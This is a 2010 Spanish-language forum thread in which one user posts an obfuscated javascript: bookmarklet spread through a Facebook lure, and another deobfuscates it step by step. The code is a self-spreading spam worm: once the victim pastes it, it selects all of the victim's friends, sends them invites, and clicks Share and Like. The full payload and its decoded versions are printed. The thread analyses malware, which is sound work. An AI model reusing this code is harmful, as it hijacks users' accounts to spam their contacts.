[javascript] para quien se aburra

Ragnarok · 6 Julio 2010, 21:22 PM

Me han invitado a un grupo de facebook: "99% of people can't watch this video more than 25 seconds"

Allí te dicen que vayas a esta dirección, que es un script:

Código (javascript) [Seleccionar]

javascript:(function(){a='app107489592636080_PKhcGc';b='app107489592636080_xKbQFX';hzgjtD='app107489592636080_hzgjtD';yhXHmG='app107489592636080_yhXHmG';BWKgQn='app107489592636080_BWKgQn';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('P e=["\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);',62,85,'||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||BWKgQn|fs|SocialGraphManager|for|in|if|20|yhXHmG|hzgjtD|21|2000|4000|3000'.split('|'),0,{}))})();

No os quejaréis que os lo doy con colores y todo...

El caso es que me da igual lo que haga la función, me da igual el vídeo y en general me da igual lo que pase en facebook, para mí es una libreta de direcciones con trackback. Y desde luego no me voy a poner a ejecutar tronchos de javascript que no sé lo que hacen, de dónde vienen ni los controles que pueden haber pasado. Tal vez en una máquina virtual, si tuviera tiempo e interés. Pero he pensado que os puede interesar a los que estéis aprendiendo javascript, ofuscación, etc.

Shell Root · 6 Julio 2010, 23:23 PM

Des-Ofuscando un poco el código.

Código (javascript) [Seleccionar]

javascript: (function() {
    a = 'app107489592636080_PKhcGc';
    b = 'app107489592636080_xKbQFX';
    hzgjtD = 'app107489592636080_hzgjtD';
    yhXHmG = 'app107489592636080_yhXHmG';
    BWKgQn = 'app107489592636080_BWKgQn';
    eval(function(p, a, c, k, e, r) {
        e = function(c) {
            return (c < a ? '': e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
        };
        if (!''.replace(/^/, String)) {
            while (c--) r[e(c)] = k[c] || e(c);
            k = [function(e) {
                return r[e]
            }];
            e = function() {
                return '\\w+'
            };
            c = 1
        };
        while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
        return p
    } ('P e=["\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);', 62, 85, '||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||BWKgQn|fs|SocialGraphManager|for|in|if|20|yhXHmG|hzgjtD|21|2000|4000|3000'.split('|'), 0, {}))
})();

Otro poco más de Des-Ofuscación:

Código (javascript) [Seleccionar]

var variables = ["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79",
		"\x73\x74\x79\x6C\x65",
		"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64", 
		"\x68\x69\x64\x64\x65\x6E", 
		"\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C", 
		"\x76\x61\x6C\x75\x65", 
		"\x73\x75\x67\x67\x65\x73\x74", 
		"\x6C\x69\x6B\x65\x6D\x65", 
		"\x73\x6C\x69\x6E\x6B", 
		"\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73", 
		"\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74", 
		"\x63\x6C\x69\x63\x6B", 
		"\x69\x6E\x69\x74\x45\x76\x65\x6E\x74", 
		"\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74", 
		"\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C", 
		"\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D", 
		"\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70",
		"\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67", 
		"\x69\x6E\x70\x75\x74", 
		"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65",
		"\x53\x68\x61\x72\x65", 
		"\x70\x6F\x70\x5F\x63\x6F\x6E\x74\x65\x6E\x74"];
d = document;
d[variables[2]](BWKgQn)[variables[1]][variables[0]] = variables[3];
d[variables[2]](a)[variables[4]] = d[variables[2]](b)[variables[5]];
s = d[variables[2]](variables[6]);
m = d[variables[2]](variables[7]);
sl = d[variables[2]](variables[8]);
c = d[variables[10]](variables[9]);
c[variables[12]](variables[11], true, true);
s[variables[13]](c);

setTimeout(function() {fs[variables[14]]()}, 5000);

setTimeout(function() {
    SocialGraphManager[variables[17]](variables[15], variables[16]);
    setTimeout(function() {
        c[variables[12]](variables[11], true, true);
        sl[variables[13]](c);
        setTimeout(function() {
            inp = document[variables[19]](variables[18]);
            for (i in inp) {
                if (inp[i][variables[5]] == variables[20]) {
                    inp[i][variables[13]](c)
                }
            };
            m[variables[13]](c);
            setTimeout(function() {
                d[variables[2]](yhXHmG)[variables[4]] = d[variables[2]](hzgjtD)[variables[5]];
            }, 2000)
        }, 4000)
    }, 3000)
}, 5000);

Y una Des-Ofuscación total, podría ser algo así:

Código (javascript) [Seleccionar]

	document.getElementById(BWKgQn).sytle.visibility="hidden";
	document.getElementById(a).innerHTML = getElementById(b).value;
	s = document.getElementById(suggest);
	m = document.getElementById(likeme);
	sl = document.getElementById(slink);
	c = document.createEvent("MouseEvents").initEvent(click, true, true);
	document.getElementById(suggest).dispatchEvent(c);
	
	setTimeout(function() {fs.select_all()}, 5000);
	setTimeout(function() {
	    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
    setTimeout(function() {
			document.createEvent("MouseEvents").initEvent("click", true, true);
			suggestLink.dispatchEvent("mouseEvent");
			setTimeout(function() {
				inp = document.getElementsByTagName(input);
				for (i in inp) {
					if (inp[i].value == "Share") {
						inp[i].dispatchEvent(c)
					}
				};
				
				document.getElementById(likeme).dispatchEvent(c);
				
				setTimeout(function() {
					document.getElementById(yhXHmG).innerHTML = document.getElementById(hzgjtD).value;
				}, 2000)
			}, 4000)
		}, 3000)
	}, 5000);

Nota: Interesante código, aunque fácil de des-ofuscar. Prácticamente se trata de SPAM!. Jojjojojojo me gusto, si tienen más ponedlos!

Test Foro de elhacker.net SMF 2.1

[javascript] para quien se aburra

Ragnarok

Shell Root